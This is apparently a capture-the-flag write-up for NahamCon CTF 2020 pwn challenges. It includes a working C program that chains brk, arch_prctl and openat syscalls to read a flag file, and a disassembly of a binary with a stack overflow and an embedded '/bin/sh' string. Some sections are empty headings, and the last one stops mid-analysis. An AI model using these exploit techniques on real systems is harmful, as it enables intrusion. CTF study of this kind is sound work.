NahamCon CTF 2020

### Dangerous

### SaaS

```c
int brk(void *addr);
int arch_prctl(int code, unsigned long addr);
int openat(int dirfd, const char *pathname, int flags, mode_t mode);
ssize_t write(int fd, const void *buf, size_t count);
```
  • brk() lets us allocate heap memory; we need it to create space to write() our flag into.
  • arch_prctl() sets the FS and GS segment base registers on x86_64 Linux. Long story short, this syscall lets us write 4 bytes to wherever we point it.
  • openat() is the same as open(), but it returns an fd if we provide a dirfd (AT_FDCWD) and a relative pathname (the one we wrote with arch_prctl()).

We need to "set" the value to write (ARCH_SET_GS) before we "get" it into the address we want to write to (ARCH_GET_GS). The constants come from the kernel headers:
```c
#include <asm/prctl.h>   /* ARCH_SET_GS / ARCH_GET_GS */
#include <fcntl.h>       /* AT_FDCWD */
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Print the constants we have to pass to the SaaS syscalls. */
int main(void) {
    printf("ARCH_SET_GS = 0x%x\n", ARCH_SET_GS);
    printf("ARCH_GET_GS = 0x%x\n", ARCH_GET_GS);
    printf("AT_FDCWD = 0x%x\n", AT_FDCWD);
    return 0;
}
```
  • call brk(0) to get the current heap base
  • extend the heap by 0x1000 with brk()
  • write 'flag.txt' into the heap using the arch_prctl() set/get wrapper above
  • call openat() to get an fd for the file, then read() the flag and write() it out
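The four steps above, as an added example written for this page (not the author's solver): it runs the same chain locally on x86_64 Linux, using glibc's sbrk() for the brk() calls and syscall(SYS_arch_prctl, ...) for the set/get pair. The file name flag.txt, the 0x1000 heap extension and the read buffer size are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
#ifdef __x86_64__
#include <asm/prctl.h> /* ARCH_SET_GS, ARCH_GET_GS */
#endif

/* Store one 8-byte value at dst with the arch_prctl() primitive:
 * ARCH_SET_GS saves the value as the GS base, ARCH_GET_GS copies that
 * base to any user address. The kernel rejects bases >= TASK_SIZE_MAX,
 * so the value must fit in 47 bits, hence 4 bytes of text per call. */
static int gs_write(unsigned long value, void *dst) {
#ifdef __x86_64__
    unsigned long saved;
    if (syscall(SYS_arch_prctl, ARCH_GET_GS, &saved) < 0) return -1;
    if (syscall(SYS_arch_prctl, ARCH_SET_GS, value) < 0) return -1;
    if (syscall(SYS_arch_prctl, ARCH_GET_GS, dst) < 0) return -1;
    return (int)syscall(SYS_arch_prctl, ARCH_SET_GS, saved); /* restore GS */
#else
    /* The primitive is x86_64-only; a plain copy keeps the demo building. */
    memcpy(dst, &value, sizeof value);
    return 0;
#endif
}

/* Write "flag.txt" (assumed file name) as two little-endian 4-byte
 * chunks; each 8-byte store zero-pads, so dst needs 12 bytes. */
int write_name(char *dst) {
    if (gs_write(0x67616c66UL, dst) < 0) return -1;     /* "flag" */
    if (gs_write(0x7478742eUL, dst + 4) < 0) return -1; /* ".txt" */
    return 0;
}

int main(void) {
    char *heap = sbrk(0);                      /* brk(0): heap base */
    if (sbrk(0x1000) == (void *)-1) return 1;  /* grow heap by 0x1000 */
    if (write_name(heap) < 0) return 1;        /* file name now on heap */
    int fd = openat(AT_FDCWD, heap, O_RDONLY); /* relative path */
    if (fd < 0) { perror("openat"); return 1; }
    char buf[128];
    ssize_t n = read(fd, buf, sizeof buf);
    if (n > 0) write(1, buf, (size_t)n);       /* print the flag */
    return 0;
}
```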

### shift-ahoy

### syrup

```
Disassembly of section .text:

0000000000401000 <fn2>:
  401000: 55                      push   rbp
  401001: 48 89 e5                mov    rbp,rsp
  401004: 58                      pop    rax
  401005: 48 bf 11 20 40 00 00    movabs rdi,0x402011
  40100c: 00 00 00
  40100f: 0f 05                   syscall
  401011: 5d                      pop    rbp
  401012: c3                      ret

0000000000401013 <nope>:
  401013: b8 01 00 00 00          mov    eax,0x1
  401018: bf 01 00 00 00          mov    edi,0x1
  40101d: 48 be 11 20 40 00 00    movabs rsi,0x402011
  401024: 00 00 00
  401027: ba 07 00 00 00          mov    edx,0x7
  40102c: 0f 05                   syscall
  40102e: b8 3c 00 00 00          mov    eax,0x3c
  401033: bf 00 00 00 00          mov    edi,0x0
  401038: 0f 05                   syscall
  40103a: 2f                      (bad)
  40103b: 62                      (bad)
  40103c: 69                      .byte 0x69
  40103d: 6e                      outs   dx,BYTE PTR ds:[rsi]
  40103e: 2f                      (bad)
  40103f: 73 68                   jae    4010a9 <_start+0x27>
  ...

0000000000401042 <fn1>:
  401042: 55                      push   rbp
  401043: 48 89 e5                mov    rbp,rsp
  401046: b8 ad de 00 00          mov    eax,0xdead
  40104b: 48 35 ef be 00 00       xor    rax,0xbeef
  401051: 50                      push   rax
  401052: 48 83 ed 08             sub    rbp,0x8
  401056: 48 81 ed 00 04 00 00    sub    rbp,0x400
  40105d: b8 00 00 00 00          mov    eax,0x0
  401062: bf 00 00 00 00          mov    edi,0x0
  401067: 48 89 ee                mov    rsi,rbp
  40106a: ba 00 08 00 00          mov    edx,0x800
  40106f: 0f 05                   syscall
  401071: 58                      pop    rax
  401072: 48 35 ef be 00 00       xor    rax,0xbeef
  401078: 48 3d ad de 00 00       cmp    rax,0xdead
  40107e: 75 93                   jne    401013 <nope>
  401080: 5d                      pop    rbp
  401081: c3                      ret

0000000000401082 <_start>:
  401082: 55                      push   rbp
  401083: 48 89 e5                mov    rbp,rsp
  401086: b8 01 00 00 00          mov    eax,0x1
  40108b: bf 01 00 00 00          mov    edi,0x1
  401090: 48 be 00 20 40 00 00    movabs rsi,0x402000
  401097: 00 00 00
  40109a: ba 11 00 00 00          mov    edx,0x11
  40109f: 0f 05                   syscall
  4010a1: e8 9c ff ff ff          call   401042 <fn1>
  4010a6: e9 68 ff ff ff          jmp    401013 <nope>
```
The read syscall inside fn1:

```
  40105d: b8 00 00 00 00          mov    eax,0x0
  401062: bf 00 00 00 00          mov    edi,0x0
  401067: 48 89 ee                mov    rsi,rbp
  40106a: ba 00 08 00 00          mov    edx,0x800
  40106f: 0f 05                   syscall
```

```c
ssize_t read(int fd, void *buf, size_t count);
```

```
  401080: 5d                      pop    rbp
```

Nguyễn Tín